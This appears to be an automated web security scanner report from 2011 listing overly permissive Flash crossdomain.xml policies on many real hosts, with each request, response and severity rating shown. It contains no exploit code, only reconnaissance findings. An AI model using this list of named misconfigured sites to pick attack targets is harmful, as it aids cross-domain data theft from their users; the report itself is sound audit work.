GET /crossdomain.xml HTTP/1.0 Host: s.mcstatic.com |
HTTP/1.0 200 OK Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT ETag: "1f7026e-d0-49c3e3a02a580 Server: Apache Accept-Ranges: bytes Content-Length: 208 Content-Type: application/xml Date: Mon, 16 May 2011 12:49:28 GMT Connection: close Cache-Control: max-age=2592000 Expires: Wed, 15 Jun 2011 11:51:15 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s0.2mdn.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s0.2mdn.net |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Mon, 16 May 2011 10:45:39 GMT Expires: Fri, 13 May 2011 10:43:36 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 5388 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s1.mcstatic.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s1.mcstatic.com |
HTTP/1.0 200 OK Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT ETag: "1f7026e-d0-49c3e3a02a580 Server: Apache Accept-Ranges: bytes Content-Length: 208 Content-Type: application/xml Date: Mon, 16 May 2011 12:49:27 GMT Connection: close Cache-Control: max-age=2592000 Expires: Wed, 15 Jun 2011 11:51:15 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s3.mcstatic.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s3.mcstatic.com |
HTTP/1.0 200 OK Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT ETag: "1f7026e-d0-49c3e3a02a580 Server: Apache Accept-Ranges: bytes Content-Length: 208 Content-Type: application/xml Date: Mon, 16 May 2011 12:49:28 GMT Connection: close Cache-Control: max-age=2592000 Expires: Wed, 15 Jun 2011 11:51:15 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s4.mcstatic.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s4.mcstatic.com |
HTTP/1.0 200 OK Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT ETag: "1f7026e-d0-49c3e3a02a580 Server: Apache Accept-Ranges: bytes Content-Length: 208 Content-Type: application/xml Date: Mon, 16 May 2011 12:49:27 GMT Connection: close Cache-Control: max-age=2592000 Expires: Wed, 15 Jun 2011 11:51:15 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s6.mcstatic.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s6.mcstatic.com |
HTTP/1.0 200 OK Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT ETag: "1f7026e-d0-49c3e3a02a580 Server: Apache Accept-Ranges: bytes Content-Length: 208 Content-Type: application/xml Date: Mon, 16 May 2011 12:49:28 GMT Connection: close Cache-Control: max-age=2592000 Expires: Wed, 15 Jun 2011 11:51:15 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://secure-us |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: secure-us.imrworldwide |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:49:30 GMT Server: Apache Cache-Control: max-age=604800 Expires: Mon, 23 May 2011 12:49:30 GMT Last-Modified: Wed, 14 May 2008 01:55:09 GMT ETag: "10c-482a467d" Accept-Ranges: bytes Content-Length: 268 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <site-control permi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://spe.atdmt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: spe.atdmt.com |
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Expires: Mon, 23 May 2011 12:36:15 GMT Date: Mon, 16 May 2011 12:52:12 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-po ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://static.getclicky |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: static.getclicky.com |
HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2011 12:31:48 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://static.getclicky |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: static.getclicky.com |
HTTP/1.1 200 OK Server: nginx Date: Mon, 16 May 2011 12:44:35 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://va.px.invitemedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: va.px.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 12:52:09 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://winter.metacafe |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: winter.metacafe.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:49:31 GMT Server: Apache Last-Modified: Mon, 09 Aug 2010 08:58:38 GMT ETag: "cc10e5-d0-48d6038e8cb80" Accept-Ranges: bytes Content-Length: 208 Cache-Control: max-age=2592000 Expires: Wed, 15 Jun 2011 12:49:31 GMT Vary: Accept-Encoding,User Edge-control: !no-store,cache-maxage Keep-Alive: timeout=2, max=48 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.betsson.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.betsson.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 11 Jan 2008 13:00:48 GMT Accept-Ranges: bytes ETag: "0c02dfc5154c81:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:35 GMT Connection: close Content-Length: 208 Set-Cookie: BIGipServerwww.betsson <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-p ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.huddletogether |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.huddletogether.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:12:17 GMT Server: Apache Last-Modified: Sun, 21 May 2006 19:01:08 GMT ETag: "317417c-cb-4145102292500 Accept-Ranges: bytes Content-Length: 203 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.metacafe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.metacafe.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT ETag: "156a2de-d0-49d966e98b740 Accept-Ranges: bytes Content-Length: 208 Content-Type: application/xml Cache-Control: max-age=86400 Date: Mon, 16 May 2011 12:25:15 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.neogames.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.neogames.com |
HTTP/1.1 200 OK Content-Length: 287 Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 11:24:37 GMT Accept-Ranges: bytes ETag: "34cdc3c714becb1:d66" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:35:50 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:20:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://br.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: br.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:10:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://br.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: br.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:02:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://da.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: da.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:14:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://da.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: da.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:47:18 GMT Accept-Ranges: bytes ETag: "7c4663cf47b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:31:56 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://da.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: da.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:24:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 909 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://da.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: da.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:02:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://da.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: da.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:33:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://de.bigmoneyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: de.bigmoneyscratch.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:32:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://de.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: de.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:47:23 GMT Accept-Ranges: bytes ETag: "5e4890d247b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:32:27 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://de.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: de.karamba.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://de.scratch2cash |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: de.scratch2cash.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://de.scratchcar |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: de.scratchcardheaven.com |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 908 <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.scratch2cash.com" /> <allow-access-from domain="*.hopa.com" /> <allow-access-from domain="*.neogames-tech.com" /> <allow-access-from domain="*.wingrattage.com" /> <allow-access-from domain="*.winnings.com" /> <allow-access-from domain="*.crazyscratch.com" /> <allow-access-from domain="*.luckyacefeeds.com" /> <allow-access-from domain="*.netticasino.com" /> <allow-access-from domain="*.slotsandgames.com" /> <allow-access-from domain="*.topscratch.com" /> <allow-access-from domain="*.extraspel.com" /> <allow-access-from domain="*.primewinners.com" /> <allow-access-from domain="*.superfortuna.it" /> <allow-access-from domain="*.cdnfo.com" /> <allow-access-from domain="*.postcodelottery.com" /> <allow-access-from domain="*.mrspil.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://download.neogames |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: download.neogames-tech |
HTTP/1.1 200 OK Content-Length: 1044 Content-Type: text/xml Last-Modified: Wed, 02 Mar 2011 10:58:07 GMT Accept-Ranges: bytes ETag: "f67924b6c8d8cb1:d66" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:37:56 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.karamba.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.neogames-tech.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.neogamespartners.com" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.neogames-tech.com" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.qa.neogames-tech ...[SNIP]... <allow-access-from domain="secure.st.neogames-tech ...[SNIP]... <allow-access-from domain="secure.dev.neogames-tech ...[SNIP]... <allow-access-from domain="*.slotsandgames.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.qa.slotsandgames.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.netticasino.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.qa.netticasino.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.extraspel.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://download.neogames |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: download.neogames-tech |
HTTP/1.1 200 OK Content-Length: 1044 Content-Type: text/xml Last-Modified: Wed, 02 Mar 2011 10:58:07 GMT Accept-Ranges: bytes ETag: "f67924b6c8d8cb1:b9f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:00:06 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.karamba.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.neogames-tech.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.neogamespartners.com" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.neogames-tech.com" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.qa.neogames-tech ...[SNIP]... <allow-access-from domain="secure.st.neogames-tech ...[SNIP]... <allow-access-from domain="secure.dev.neogames-tech ...[SNIP]... <allow-access-from domain="*.slotsandgames.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.qa.slotsandgames.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.netticasino.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.qa.netticasino.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.extraspel.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://el.crazyscratch |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: el.crazyscratch.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 08:47:34 GMT Accept-Ranges: bytes ETag: "9e74d2d847b9cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:31:40 GMT Connection: close Content-Length: 280 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <allow-access-from domain="crazyscratch.com" /> <allow-access-from domain="*.crazyscratch.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://el.karamba.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: el.karamba.com |
